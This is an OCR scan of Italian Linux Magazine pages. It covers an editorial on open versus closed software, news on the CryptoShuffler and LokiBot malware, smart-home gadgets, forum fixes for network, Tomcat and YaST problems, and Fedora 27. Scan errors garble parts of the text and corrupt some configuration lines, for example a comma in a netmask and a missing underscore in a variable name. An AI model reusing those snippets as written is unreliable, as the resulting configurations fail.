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Open o closed? Tutti e due 


Sì, è vero. Scrivere di software 
commerciale su una rivista dedicata 

a GNU/Linux è inusuale. Perché dopo- 
tutto la quasi totalità degli applicativi 
disponibili per il Pinguino è distribu- 
ito come FOSS (Free Open Source 
Software), seguendo la filosofia che 
da sempre distingue il nostro sistema 
operativo preferito dai “classici” pro- 
prietari. Ma, con il crescere dell'eco- 
sistema GNU/Linux non può non cre- 
scere l'interesse delle software house 
che da sempre sviluppano solo per 
Microsoft Windows o Mac OS X anche 
per questa nuova (almeno per loro) re- 
altà. Il dilemma dunque è: affidarsi uni- 
camente a software Libero e gratuito o 
aprirsi (un termine, questo, che va un 
po' in contrapposizione con il closed 
source dei programmi commerciali) 
anche a soluzioni diverse? La risposta 
a tale domanda non è così semplice 
come può apparire. Dal punto di vista 
prettamente etico (e tenendo sempre 
ben in mente i principi che hanno visto 
nascere GNU, Linux e, più in generale, 
il FOSS) sarebbe un po' un contro- 
senso utilizzare software commerciale 
sulla propria distro: perché scegliere 
un sistema operativo Libero e aperto 
e poi piazzarci all'interno un software 
per natura chiuso e dunque potenzial- 
mente in grado di svolgere qualsiasi 
tipologia di operazione nasconden- 
dola agli occhi degli utenti? Uno dei 
grandi errori che si compie quando si 
ha da parlare di GNU/Linux e di FOSS 
è pensare subito ad un qualcosa di 
gratuito: la sua prima qualità non sta 
nel prezzo (che non è detto che non 

ci sia - basta pensare a Red Hat En- 
terprise Linux che ha un costo anche 
abbastanza importante), ma nella sua 
totale trasparenza. Il poter osservare e 
analizzare il 100% del codice sorgente 
che lo compone ci rende completa- 
mente consapevoli di ciò che quel 
software possa fare. Non c'è nulla di 
nascosto. Un software proprietario, 
invece, non è quasi mai Open Source. 
Pensiamo ad esempio ad Adobe 
Photoshop, uno dei programmi di 
grafica professionali più gettonati fra 


quelli commerciali. Tanto di cappello 
alle sue potenzialità e agli strumen- 

ti che mette a disposizione, ma ci 
siamo mai chiesti se durante l'uso 
possa carpire di nascosto informazio- 
ni sull'hardware del nostro PC o sul 
progetto grafico a cui stiamo lavoran- 
do? Senza creare inutile allarmismo, 
anche perché con ogni probabilità 
non è il caso di Adobe, non potremmo 
saperlo mai. Semplicemente perché 
non avremo mai libero accesso al 
codice sorgente di Photoshop o di 
qualsiasi altro software commerciale 
chiuso. Dunque, ritornando al quesito 
principale, dal punto di vista etico uti- 
lizzare software commerciale e closed 
sulla nostra distro GNU/Linux non è 
per nulla corretto. Seppur moralmen- 
te scorretto, però, dobbiamo essere 
consapevoli che, qualora lo volessimo, 
siamo pur sempre liberi di installare 

e usare un programma commerciale. 
E quel termine, “liberi”, non è messo 

lì a caso. Siamo liberi di scegliere se 
dare un'occhiata al codice sorgente di 
un software Open Source, così come 
siamo liberi di scegliere se installare 

o meno un programma commerciale 
chiuso (a nostro rischio e pericolo, 

se vogliamo fare i catastrofisti). A 
qualcuno potrà scappare una risata a 
sentir parlare di libertà accanto ad un 
software commerciale, ma fermandosi 
un attimo e ragionandoci un po' ci si 
rende facilmente conto che si tratta 
solo di un preconcetto da abbattere. | 
software proprietari, gratuiti o a paga- 
mento che siano, per GNU/Linux sono 
una realtà e non la si può nascondere. 
Probabilmente qualcuno starà pen- 
sando: “a questo punto cancello GNU/ 
Linux e passo a Windows”. Proprio 

a questi vogliamo chiedere: perché 
esiste Wine che ci consente di avviare 
software per Microsoft Windows 
anche sulla nostra distro GNU/Linux? 
Per essere veramente aperti, non do- 
vremmo chiudere nessuna porta. 


Vincenzo Cosentino 
Invia il tuo commento a: 
linuxmag@edmaster.it 
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Criptomonete in pasto ai cyber-criminali 


Bitcoin, Ethereum e altre monete virtuali: sono tutte nel mirino dei pirati 


MMI Oltre a essere uno degli 
strumenti prediletti dagli 
autori di ransomware per 
ricevere il “riscatto” dalle 
rispettive vittime,  Bitcoin 
rappresenta sempre più un 
bersaglio privilegiato dei 
cyber-criminali in quanto 
moneta virtuale con un va- 
lore di mercato molto con- 
creto. Gli autori di Crypto- 
Shuffler, ad esempio, hanno 
guadagnato un bel po' di 
denaro prendendo di mira 
gli ignari utenti che si sono 
ritrovati con il sistema in- 
fetto. Il meccanismo di fun- 
zionamento principale di 
CryptoShuffler è essenziale 
ma estremamente efficace, 
visto che il trojan identifi- 


@ bitcoin 


limita a tenere sotto con- 
trollo gli appunti di sistema 
in attesa che la vittima copi 
l'indirizzo del suo portafo- 
gli virtuali (wallet} per una 
transazione a mezzo Bitcoin. 
A quel punto il malware so- 
stituisce il wallet originale 
con quello controllato dai 
cyber-criminali, e se l'utente 
non si accorge della sostitu- 
zione la transazione porta al 
trasferimento dei Bitcoin sul 
wallet “malevolo”. Attiva sin 
dal 2016, la cyber-minaccia 
di CryptoShuffler è tornata 


qui permesso ai suoi autori 
di incamerare un gruzzolo 
piuttosto consistente. Il wal- 
let controllato dai criminali 
risulta infatti “pieno”. con 
23 Bitcoin, vale a dire più di 
150.000 dollari secondo l'at- 
tuale valore della criptomo- 
neta. E non di solo Bitcoin 
si ingrassa CryptoShuffler: 
stesso trattamento per le 
transazioni in Dogecoin, Li- 
tecoin, Dash, Monero, Ethe- 
reum e altre. 


Per informazioni: 
www.edmaster.it/url/7166 


‘ sione dei privilegi 


cato da Kaspersky Labs si alla ribalta nel 2017 e ha sin 


LokiBot: il trojan bancario per Android 


Scovato un malware che compromette gli account bancari degli utenti 


M ! ricercatori di SfyLabs hanno individuato 
una nuova minaccia classificata come LokiBot, 
un trojan bancario per Android che all'occor- 
renza prova a far paura all'utente trasforman- 
dosi in ransomware. Il payload principale di Lo- 
kiBot consiste nell'interferire nell'attività delle 
app bancarie legittime, con la visualizzazione di 
schermate di login fasulle ogni qualvolta l'uten- 
te avvia una delle succitate app per il furto del- 
le credenziali di accesso. Al momento, i cyber- 
criminali offrono LokiBot sull'underground 
telematico con un costo di 2.000 dollari per li- 
cenza - da pagare naturalmente in Bitcoin. 

Il malware funziona sui 
terminali Android dalla 
versione 4.0 in su e ne- 
cessita della conces- 


di amministratore 
durante l'instal- 
lazione. Qualora 
l'utente provas- 
se a ritirare i 


(N 
3. 


suddetti privilegi precedentemente concessi, 
però, LokiBot mostra la sua seconda natura en- 
trando in “modalità ransomware” con il blocco 
del terminale, la visualizzazione di una scher- 
mata di “allarme pedopornografia” fasulla con 
una richiesta del riscatto (100 dollari in Bitcoin 
entro 48 ore) piuttosto reale e la codifica dei file 
dell'utente tramite algoritmo AES128. La codi- 
fica dei file non funziona però come dovrebbe, 
spiegano i ricercatori, visto che i file origina- 
li vengono cancellati ma poi sostituiti con una 
versione decodificata scritta immediatamente 
dal malware con nomi cambiati. Anche consi- 
derando questo clamoroso svarione, in ogni 
caso, i criminali a cui si deve la creazione di 
_ LokiBot hanno messo in piedi un busi- 
x nessnon proprio fallimentare: circa 
1,5 milioni di dollari in Bitcoin il 
bottino. 


Per informazioni: 
www.edmaster.it/ 
url/7167 


Google, tra le nuvole con Gisco 


Mountain View stringe un’alleanza con Cisco per contrastare Microsoft e Amazon 


MI Le due parlano di solu- 
zioni cloud ibride, a metà 
strada tra le soluzioni della 
piattaforma Google Cloud e i 
software on-premise, ovvero 
quelli installati ed eseguiti di- 
rettamente in locale e che con 
Cisco hanno un'impostazione 
orientata all'impresa sia dal 
punto di vista della gestione 
di rete che delle questioni di 
sicurezza. In pratica, si trat- 
terebbe di uno strumento per 
far girare e controllare i ca- 
richi di lavoro e gestire i dati 
tra le diverse postazioni dove 
sono contenuti, favorendo 
una comprensione di come 
e dove girano i software ed 
evitando i cosiddetti “vendor 
lock in”, ovvero il pericolo che 
un'azienda o un utente si tro- 
vi legata ad un determinato 
imprenditore perché l'espor- 
tazione dei dati dalla sua ad 
un'altra piattaforma risulte- 
rebbe troppo costosa. Come 


spiega il CEO di Cisco Chuck 
Robbins: “La partnership con 
Google punta ad offrire ai no- 
stri clienti il meglio del cloud 
con la scalabilità, la sicurez- 
za e il supporto delle solu- 
zioni pensate per le aziende”. 
Per Cisco si tratta d'altra par- 
te di una soluzione quasi lo- 
gica: da tempo sta muovendo 
il suo carico di lavoro da data 
center privati ad ambienti 
cloud come Google Cloud; per 


Mountain View si tratta invece 
dell'occasione per avvicinare 
i propri servizi alle aziende. 
L'altro fattore che ha certa- 
mente spinto Google e Cisco a 
collaborare è la competizione 
nel settore: in particolare la 
sfida all'infrastruttura cloud 
di Amazon e all'ambiente 
cloud di Microsoft Azure. 


Per informazioni: 
www.edmaster.it/url/7168 


AV-TEST boccia Google Play Protect 


La soluzione di sicurezza di Mountain View è meno efficace dei competitor 


MI Dopo essere stata annunciata 
nel mese di maggio 2017, Play Pro- 
tect è stata rilasciata ufficialmen- 
te ad agosto - pochi giorni prima 
dell'uscita di Android 8.0 Oreo - 
all'interno dei Google Mobile Ser- 
vices. Stando a quanto dichiarato 
da Mountain View, la soluzione 

controlla periodicamente le app 
installate sul terminale, in modo da 


offrire una protezione costante: i server di Go- 
ogle analizzano giornalmente oltre un miliardo 
di dispositivi e cinquanta miliardi di applicazioni. 
Ciononostante, secondo il report di settembre 
dell'istituto indipendente AV-TEST, Play Protect 
si è rivelata decisamente inefficace nel rileva- 
mento dei malware, totalizzando il punteggio 


Google Play 
Protect 


percentuale di 65,8% per quanto riguarda il ri- 
levamento di malware in tempo reale, e di 79,2% 


per quanto riguarda il rilevamento 
dei malware scoperti nelle ultime 
quattro settimane. La media dei 
risultati ottenuti dalle applicazioni 
dei principali competitor - tra i qua- 
li vi sono giganti del settore come 
Symantec, Kaspersky, McAfee e 
Trend Micro - in entrambi i casi, 
è superiore al 95%. Google, per il 
momento, non ha rilasciato dichia- 


razioni. Tuttavia, nonostante i dati si presentino 
come una discreta batosta dal punto di vista del 
marketing, va presa in considerazione sia la re- 
lativa giovinezza di Play Protect sia il fatto che 
non si tratti di una soluzione antivirale completa, 
ma piuttosto di una forma di protezione di base, 
presente di defautt all'interno delle Google Apps. 


Per informazioni: www.edmaster.it/url/7169 
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Flash 


m Pagamenti veloci 
con la blockchain 


Continuano gli investimenti 
di IBM Corporation sulla 
tecnologia della blockchain 
applicata ai servizi finanziari, 
un promettente nuovo mer- 
cato che ora si arricchisce di 
una piattaforma innovativa 
per la gestione dei pagamenti 
interbancari: un protocollo 
Open Source che promuove 
l’interconnessione tra sistemi 
bancari e di pagamento 
differenti. La blockchain è 
un “libro mastro” digitale e | 
distribuito pensato per tenere 
“traccia costante (e, teorica- 
mente, inviolabile) dei mo- 
vimenti di denaro in Rete e 
non solo, una tecnologia nata 
assieme a Bitcoin che si è poi 
“affrancata” dall'ingombran- 
te presenza della discussa 


| criptomoneta per comin- 


ciare il suo cammino verso 
la conquista delle piazze 
finanziarie mondiali. | colossi 


| bancarie tecnologici stanno 


investendo ingenti risorse per 
adattare la blockchain alle 

‘ rispettive esigenze commer- 
ciali, e il nuovo sistema di 
IBM rappresenta appunto 
uno dei frutti di questa acce- 
lerazione verso un’adozione 


“diffusa della tecnologia. In 
| particolare, la piattaforma 


“utilizza la Blockchain di IBM 
‘per gestire il cambio tra valu- 
te diverse e la conferma dei 
pagamenti in tempo reale, un 
modo per ridurre in maniera 
sensibile il lavoro necessario 
alla gestione delle transazioni 
interbancarie. | pagamenti in- 
ternazionali richiedono infatti 
vari intermediari e un tempo 

| che può andare da qualche 
giorno ad alcune settima- 

ne, con tanto di intervento 


“umano. La Blockchain di IBM 


risolve i suddetti problemi ve- 
locizzando le transazioni ed 
eliminando i possibili intoppi. 


ace 
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Una casa sempre più smart! 


Lampadine, accessori ed elettrodomestici “intelligenti” che ti semplificano la vita 


\ TUTTO SOTTO CONTROLLO 
° 


Tenere sempre sotto controllo la propria 
casa quando si è in vacanza o in ufficio è , 
una prerogativa di molti. In commercio è 


(o) 
A 


y È FS CEN possibile trovare IP Cam Wi-Fi per tuttele Pi 
Limitisss pOssigIiHes tasche e questa è una delle soluzioni più N ; 
108 a economiche in circolazione. Il sensore da el 
1,3 Megapixel e la risoluzione di 1280x960 È 
ser pixel consentono di fruire anche da remoto i\ 
n di una visione sufficiente per capire se c'è | 3 

qualche intruso in casa. Il controllo avviene Î 
tramite l'app NETcam disponibile gratuita- d 
mente su Android. > 
Per informazioni: È 
www.edmaster.it/url/7171 x 

UNA LAMPADINA, MILLE COLORI! 7 

PHILIPS HUE WHITE AND COLOR AMBIANCE STARTER KIT 

Accendere le luci con lo smartphone e cambiare il colore in base al 

nostro umore o per creare un ambiente più confortevole non è più CUCINA A PORTATA DI TAP 

un miraggio. | prodotti Philips Hue hanno infatti rivoluzionato l'illumi- 

nazione domestica, permettendoci di scegliere fra oltre 16 milioni di All'apparenza è un comune robot da cucina, ma in realtà è 

combinazioni di colore o di sincronizzare la luce con la musica. Questo molto di più. Dopo essere stato interfacciato con il nostro 

kit include 3 lampade con attacco E27 e il Bridge che consente di smartphone Android, ci consente di realizzare tutte le ricette 

controllare fino a 50 punti luce. proposte dall'app e pianificare preparazione e cottura. 

Per informazioni: www.edmaster.it/url/7170 Zuppe, stufati, impasti e dolce sono a portata di app. Con 


Moulinex i-Companion, chiunque può diventare uno chef! 
Per informazioni: www.edmaster.it/url/7173 


» Linux Magazine 


ENIMISICYINOT O, 


TATE 


LA PRESA INTELLIGENTE 


Con questa rivoluzionaria presa possia- f 
mo rendere smart qualsiasi elettrodome- 5 
stico o dispositivo, anche quelli vecchi 

di 40 anni! Basta collegare ad essa qual- 
siasi dispositivo per gestire, anche da re- 


L'ANTIFURTO DEL FUTURO È QUI! 


Anche gli antifurti domestici diventano più smart. Un esempio è il 
Security Kit proposto dalla cinese Xiaomi che include un Gateway e 
diversi sensori da piazzare su porte e finestre: non appena un'anomalia 
viene rilevata, l'altoparlante integrato nel Gateway incomincia a suona- 
re e riceveremo una notifica sull'app installata nel nostro smartphone 


moto, la sua accensione o spegnimento. 
Ad esempio, un condizionatore portatile, 
se collegato a questa presa, può essere 
acceso o spento anche quando siamo 
lontani da casa. Funziona anche da 
timer, settando quindi delle accensioni/ 


Android. Il kit può essere esteso con altri sensori che rilevano, ad 
esempio, la presenza di gas o acqua. 
Per informazioni: www.edmasfer.it/url/7175 
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spegnimenti automatici. 3 “i EURO 
È  Perinformazioni: EUR 
© www.edmaster.it/url/7174 
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MOLTO PIÙ DI UNA BILANCIA 


Monitora non solo il nostro peso, ma anche altri valori utili per 
meglio comprendere se siamo in buona salute (quantità di massa 
grassa, percentuale di acqua, massa muscolare, massa ossea, in- 
dicatore calorico AMR/BMR). Tutti i dati vengono trasferiti tramite 
Bluetooth sul nostro smartphone e, grazie all'app gratuita Health- 
Manager, possiamo tenere traccia di tutti icambiamenti. 

Per informazioni: www.edmaster.it/url/7176 


RISCALDAMENTO SMART 


Questo termostato Wi-Fi è controlla il sistema di riscalda- 
mento della nostra casa rendendo il tutto più efficiente (di 
conseguenza, riduce i consumi ed ottimizza il riscaldamen- 
to). La temperatura può essere variata direttamente dal 
nostro smartphone Android e la sua installazione è banale: 
essendo compatibile con tutti i sistemi di riscaldamento 
europei, basta sostituirlo al nostro vecchio termostato ed è 
già pronto all'uso. 
Per informazioni: e nes 
www.edmaster.it/url/7177 per du | 
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È Semplicemente maneggiando lo smartphone, anche 
È da remoto, possiamo controllare questo piccolo 
. robotspecializzato nel tenere pulito il pavimento di | JISIVEI 


casa. Integra anche una webcam che ci permette di 
vedere live la zona che Jisiwei 13 sta ripulendo ed è 
inoltre possibile programmare 7 differenti percorsi di 
pulizia, pianificando anche delle pulizie automatiche 


i 

È (ad esempio la mattina quando siamo a lavoro). è 
si Quando la batteria è quasi esaurita, il robot rien- 

È tra automaticamente alla sua base per ricaricarsi. 

. Perinformazioni: www.edmaster.it/url/7171 
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SOLUZIONI DAL FORUM 


Ogni mese i thread più gettonati estratti dalle discussioni dal forum di Linux Magazine. 
Se non fai ancora parte della nostra squadra, iscriviti subito e contribuisci alla crescita 
del movimento Open Source. Il nostro sito è pronto ad ospitare esperti, neofiti 0 
semplicemente chi ne vuole sapere di più a proposito di GNU/Linux e del Software Libero 


Sistema/Primi passi 


RETE E TOMCAT 


DOMANDA: Ciao a tutti ho un problema, anzi due! Il primo: quando 
effettuo il login imposto manualmente l’indirizzo IP della macchina 
da terminale con il comando ifconfig e tutto funziona a meraviglia. La 
macchina viene rilevata nella rete da tutte le altre macchine, ma quando la 
riavvio le impostazioni della rete vengono perse. Cosa devo fare affinché 
la configurazione risulti permanente? La seconda domanda: utilizzo 
l’application server Tomcat (Fig. 1) per determinate applicazioni Web. 
Per il corretto funzionamento imposto le 2 variabili d'ambiente JAVA _ 
HOME e CATALINA _HOME con il comando export senza alcun 
problema. Di nuovo, però, quando riavvio la macchina perdo le modifiche. 
Cosa devo fare per rendere le modifiche permanenti? 


SOLUZIONE: La domanda è posta dall’utente Andrea e, come di 
consueto, riportiamo il necessario che riguarda la soluzione dei due problemi 
aggiungendo, laddove possibile, ulteriori informazioni. Iniziamo dalla 
configurazione della rete. Nella richiesta non è riportata la distribuzione 
utilizzata ma, per quanto ne attiene la configurazione, possiamo dividerla 
in due grandi gruppi: Red Hat e derivate (ad esempio Fedora e CentOS) e 
Debian e derivate come *buntu e Mint. Osserviamo che se la macchina in 
questione è in una rete dove è configurato un router con server DHCP, allora 
è sufficiente installare un client DHCP, pacchetto dhcp-client su Fedora, 
Debian e OpenSUSE, software in genere installato di default e presente 
subito dopo l’installazione di una distribuzione. A questo punto è sufficiente 
riavviare la macchina affinché il protocollo DHCP (trattato in maniera 
approfondita nel numero 178 - Settembre 2017 - di Linux Magazine) inizi 
le transazioni necessarie all’assegnazione dell’indirizzo IP al client ad opera 
del server DHCP. Se invece si vuole una configurazione statica, così come 
richiesto, occorre metter mano ai file di configurazione. Abbiamo riportato 
diverse volte, nel corso degli anni, dove occorre intervenire. Su una Debian e 
derivate con un qualsiasi editor di testi dobbiamo aprire il file /etc/network/ 
interfaces riportando il minimo necessario per una configurazione statica 
che vede nella maggior parte dei casi le seguenti righe: 


auto lo eth0 

iface lo inet loopback 

iface eth0 inet static 
address 192.168.100.10 
netmask 255.255,255.0 
gateway 192.168.100.1 


Pen 
000€ 
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Server Status 


| JVM Versio: | JVM Vendor 


Physical memory: 3415.07 MB Available memory: 123.50 MB Total page file: 8191.99 MB Free file: 8191.99 MB Memory load: 97 
Process kemel mne: 2.75 s Process user time: 3120 s aree pu 


IESECI RAND | --initias | 
Heap memory 13.00 MB 
Heap memory 243.00 MB 
Heap memory 0.00 MB 
Non-heap memory 2.43 MB 
—___ Non-heap memory — __0.00 MB 


1 Eden Space 
G1 Old Gen 
G1 Survivor Space 
Code Cache 
Compressed Class Space 


Fig. 1 e Schermata dello stato del server Tomcat 


La parola chiave auto (prima riga) indica quali sono le interfacce da 
attivare al boot. La parola chiave iface presente nelle due righe successive 
servono a impostare i parametri di ciascuna interfaccia. Quella di nostro 
interesse è la eth0 (o altra se ve ne dovesse essere più di una) nella quale 
va specificata la modalità di configurazione con parole chiave separate da 
spazi: nello specifico è stato utilizzata l’opzione static che assegna i valori 
in maniera statica secondo i parametri specificati nelle righe che seguono. 
Nelle Red Hat e derivate occorre andare in /etc/sysconfig/network-scripts 
dove è presente un file per ogni interfaccia di rete con nome ifefg-nome_ 
interfaccia. Per una configurazione statica il possibile contenuto di un file 
di nome ifcfg-eth0 (o ifcfo-enp3s0 in una Fedora) può essere: 


DEVICE=eth0 
BOOTPROTO=none 
ONBOOT=yes 
IPADDR=192.168.100.10 
NETMASK=255.255.255.0 
GATEWAY=192.168.100.1 
BROADCAST=192.168.100.255 


Le singole righe sono ‘abbastanza intuitive, qualche parola per 
BOOTPROTO: indica il protocollo di configurazione da utilizzare 


all’avvio tra BootP (Bootstrap Protocol), DHCP e none quest’ultimo da 
utilizzarsi per una configurazione statica. Detto ciò passiamo al secondo 
problema. Per capire come risolverlo occorre conoscere la dinamica di una 
shell di login ovvero la shell che si ha di fronte al completamento di una 
procedura di login testuale riuscito. All’avvio di una shell di login vengono 
eseguite una serie di procedure di inizializzazione. La prima è l’esecuzione 
di tutte le istruzioni contenute nel file /ete/profile, in cui l'amministratore 
di sistema può inserire una serie di impostazioni comuni per tutti gli utenti. 
Per permettere anche agli utenti di aggiungere le loro personalizzazioni 
la shell cerca anche nella home utente che l’ha lanciata e nell’ordine che 
segue i file .bash_profile, .bash_login e .profile, eseguendo i comandi del 
primo che trova senza poi guardare gli altri. I suddetti file di configurazione 
vengono utilizzati in genere per stabilire il path (percorsi nei quali cercare 
i comandi) attraverso l’omonima variabile PATH (echo $PATH), definire 
delle variabili di interesse dell’ambiente di esecuzione e altre funzioni. Per 
la cronaca ricordiamo che tutte le shell lanciate da ambiente grafico, ad 
esempio con xterm o konsole, sono shell interattive non di login mentre 
una shell non interattiva è una shell che in quel momento processa uno 
script e il cui ambiente di esecuzione utilizzato è quello ereditato dalla shell 
genitrice. Premesso ciò, come risolviamo il problema dell’utente Andrea? In 
base a quanto riportato abbiamo due strade ad esempio eseguire i comandi 
seguenti: 


echo "export JAVA HOME=/percorso/cartella/jvm/java 
openjdk" >> /etc/profile 
echo "export CATALINA HOME=/percorso/cartella/tomcat" 
>> /etc/profile 


che accodano le righe tra doppi apici al contenuto del file /etc/profile, oppure 
aggiungere le righe seguenti: 


export JAVA HOME=/percorso/cartella/jvm/java-openjdk 
export CATALINA HOME=/percorso/cartella/tomcat 
PATH=$SPATH:$JAVA_HOME/bin 


al file .bash_profile nella propria home utente. A questo punto lanciando 
il server Tomcat dovremo riuscire a vedere la schermata di benvenuto 
collegandoci all’indirizzo /ttp:/ocalhost:8080. In Fig. 1 la sehermata di 
gestione del server Tomcat dopo l’installazione avvenuta utilizzando il 
pacchetto all-in-one di Bitnami (/ps:/bitnami.com/stack/tomcat), ma è 
possibile utilizzare anche il gestore software della propria distribuzione e 
eventualmente optare per l’installazione dai sorgenti per provare l’ultima 
versione rilasciata e non ancora presente nei repository oppure per testare 
la versione di sviluppo. La modalità di installazione da sorgenti è suggerita 
solo per i più esperti poiché necessita di oltre 20 passaggi. 


Distribuzioni/SuSE 


DOMANDA: Un po” di tempo fa ho installato openSUSE Tumbleweed 
con XFCE. Da un po’ di tempo non lo utilizzavo così ho deciso di 
avviare la distribuzione ed eseguire tutti gli aggiornamenti del caso e 
apparentemente pareva fosse andato tutto bene. Da lì a qualche ora ho 
avuto la necessità di installare altro software, e qui ho avuto l'amara 
sorpresa: la GUI di Yast non funziona! Se provo a lanciare il programma 
da terminale ottengo il seguente errore: 
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© micha : bash — Konsole 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


zypper se Llibyui-gt 
Caricamento dati del repository in corso... 
Lettura dei pacchetti installati in corso... 


Nome | Sommario 
+—----------------------------------- + 
libyui-qt-devel | Libyui-qt header files 

libyui-qt-doc | Libyui-qt documentation 
libyui-qt-graph-devel | Libyui-qt-graph header files 
libyui-qt-graph-doc | Libyui-qt-graph documentation 
libyui-qt-graph7 | 
libyui-qt-pkg-devel | 
libyui-qt-pkg-doc | 
libyui-qt-pkg7 | 
libyui-qt7 | 


Libyui-qt-pkg header files 
Libyui-qt-pkg documentation 
Libyui - selettore di pacchetti Qt 


I 
I 
I 
| 
Libyui - widget Graph in Qt | 
I 
I 
I 
Libyui - interfaccia utente Qt 


Fig. 2 e Output in forma “tabellare” del gestore software 
testuale zypper 


linux-ivj9:/home # yast2 
QStandardPaths: wrong ownership on runtime directory 
run/user/1000, 1000 instead of 0 
Ot: Session management error: Authentication Rejected, 
reason : None of the authentication protocols specified 
are supported and host-based authentication failed 
Run command: /sbin/yast2 sw single & 
terminate called after throwing an instance of 
'YUIPluginException' 
what (): 
/sbin/yast2: riga 450: 


Couldn't load plug-in qt 
5946 Annullato (core dump 
creato) $ybindir/y2start $module "$@" "SSELECTED GUI" 
$Y2 GEOMETRY $Y2UI_ARGS 
Run command: /sbin/yast2 bootloader & 
terminate called after throwing an instance of 
'YUIPluginException' 
what (): Couldan't load plug-in at 
Dall'output riportato è evidenziato anche che se provo ad avviare delle 
applicazioni lanciabili da Yast2, ad esempio il gestore software (comando / 
sbin/yast2 sw_single &) o il gestore del bootloader (comando /sbin/yast2 
bootloader &) non si avvia nulla. Se avvio Yast in modalità legacy invece 
funziona tutto senza problemi ma con la grafica e la minore usabilità di tale 
modalità. Oggi ho eseguito un nuovo aggiornamento che però non ha sortito 
nulla. Come posso risolvere? 


SOLUZIONE: Il problema è stato riscontrato dall’utente Sargon6 ed 
ha avuto una pronta risoluzione tramite la seguente procedura. Il primo 
passo è verificare la presenza della libreria libXrender1 e qualora non lo 
fosse procedere all’installazione. A questo punto da terminale lanciamo il 
comando zypper se libyui-qt laddove se sta per l’abbreviativo di search 
(man zypper per approfondimenti) che dovrebbe restituire un output nella 
forma visibile in Fig. 2. Verifichiamo se la libreria libyui-qt7 è installata e 
qualora non lo fosse procediamo all’installazione. Se nell’elenco è presente 
la libreria libyui-gt8, o versione più nuova, installiamo questa al posto 
di una delle versioni precedenti. Eseguita queste azioni la GUI di Yast2 è 
ritornata a funzionare senza problemi. 
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Distribuzioni 

na nuova release di Fedora, una delle distro più apprezza- 
Ut dagli utenti, è finalmente disponibile. Stiamo parlando 
della 27, come al solito disponibile per Workstation, Server 
o Atomic. Cosa c'è di nuovo? La prima cosa che balza subito 
all'occhio è il desktop aggiornato, GNOME 3.26 che, come è 
noto ai più informati, corregge un bel po’ di bug e migliora 
l'esperienza d'uso. Non poteva mancare anche un update per 
il kernel Linux, ora in versione 4.13. Tra i software che usual- 


mente vengono forniti out-of-the-box, segnaliamo anche un 
aggiornamento per LibreOffice, che passa ora alla sua release 
5.4. E poi c'è una nuova funzionalità in Fedora Media Writer 
che permette ora di creare anche delle memorie portatili (SD) 
avviabili. Funzionalità, questa che sarà senza dubbio apprez- 
zata dal pubblico che ha ad esempio un Raspberry Pi e che 
si ritrova spesso a scrivere l’SD con il sistema operativo da 
avviare sul mini PC. 


< Details 
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%* Default Applications 


Fedora 27 


me | localhost-live 

1968 

Intel® Core 13-2310M CPU @ 2.10GHz = 4 
Intel® Sandybridge Moblle 

Version 3.26.1 

64-bit 

Disk Obytes 


Check for updates 


Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili o 
eseguibili in modalità LIVE. Basta inserire il DVD-Rom nell'apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni. 
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EEC] 


L'INTERFACCIA 


Per le distribuzioni disponibili sotto forma di immagini ISO, apriamo il 
DVD-Rom coni file manager e clicchiamo due vole sul file index.htm. 
A questo punto, dovrebbe apparire l'interfaccia di gestione. Clicchiamo 
sull'illustrazione o sulla voce Distribuzioni presente nel menu a destra. 
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[3 Indice di/media/backup x 


© | [1 fite:///media/backup/Distribuzioni/dwi-10-149-+/distribuzioni/ 


Indice di /media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 


Nome Dimensioni Data ultima modifica 
È [directory principale] 
Kubantu-12.04.3 


Ubuntu-12.04.3 


20/08/13 12:25:57 
26/08/13 12:30:01 


DOWNLOAD ISO 


Da qui, possiamo scaricare l'immagine ISO della distribuzione semplicemente 
accedendo alla sua eventuale cartella e premendo sul relativo link. Dopodiché, 
possiamo masterizzare l'150 su Cd-Rom e DVD-Rom per creare il supporto di 
installazione o trasferirla su una pendrive USB bootable. 


OLTRE 4 GB DI SOFTWARE COMPLETI! 


Vr ORARIE SRIRO AN ANOAOPIRLITRR T Er MISSA RE RRP IAT RI PRRT VERITA 


bbiamo voluto dedicare la cover story (pag. 14) di que- 

to numero di Linux Magazine ai software disponibili per 
GNU/Linux, che siano essi Open Source e Liberi o commerciali. 
Dopotutto, attorno al Pinguino, anche se alcune volte lo dimen- 
tichiamo, ruota anche un ecosistema di programmi sviluppati 
da software house che distribuiscono i loro prodotti sotto licenza 
a pagamento. E magari, per quanto possiamo sempre preferire 
il FOSS (non solo per ragioni economiche) non possiamo fare a 


LL fee fee fto Tepon stre 10 LAO lock ffodoe rito 
DOkJ]sr 8 pOoORDefvip? Ban 


Ras: #79 n-0- 


Creare un nuovo progetto: Progetti recenti: - 


Progetto audio Im-138.iso 


|ud Crea un cD audio tradizionale Mageia-2-1586-DVD.iso 


KNOPPIX_V7.0.1DVD-2012-05-24-EN 
Progetto dati 


" Im-137-b.iso 
FT} Crea unCDo DVDdi dati 


linuxmint-13-mate-dvd-32bit.iso 


Progetto video 
[n | Crea un DVD video o unsVCeDn 


Copia disco 
Crea una copia 1:1 di un CD/DVD 


Masterizza immagine 
Masterizza un'immagine CD/DVD esistente su disco 


MASTERIZZAZIONE SUPPORTI 


In ambiente Gnome possiamo utilizzare Brasero, su KDE K3b. Nel primo 
caso, avviamo il software, clicchiamo su Masterizza immagine e selezio- 
niamo l'ISO da masterizzare. Con K3b, invece, clicchiamo su Strumenti/ 
Masterizza immagine ISO e selezioniamo l'immagine ISO. 


RIPARARE SATIRA HIT 


meno di utilizzare un programma a pagamento (ad esempio PDF 
Studio Pro, nativo per GNU/Linux). Inoltre, abbiamo raccolto 
anche una serie di softwafe, sviluppati per Microsoft Windows o 
MacOSX, ma che grazie a Wine funzionano perfettamente anche 
sulla nostra distro GNU/Linux (ad esempio Adobe Photoshop o 
Ashampoo Home Designer Pro). Per scoprire l'elenco completo 
dei software disponibili sul DVD, basta avviare il DVD e, dopo 
aver avviato la sua interfaccia, cliccare sul pulsante Plus. 


© iffLokple - Nuke 


boe) UNetbootin 


{ Distribution [= Select Distribution == “] [== Select Version 
Benvenuti in UNetbootin, il Netboot Installer universale. Uso: 
1. Selezionare dalla lista qui sopra una distribuzione ed una version 


specificare manualmente i file da caricare qui sotto. 
2. Selezionare un tipo di installazione e fare clic su OK per iniziarla. 


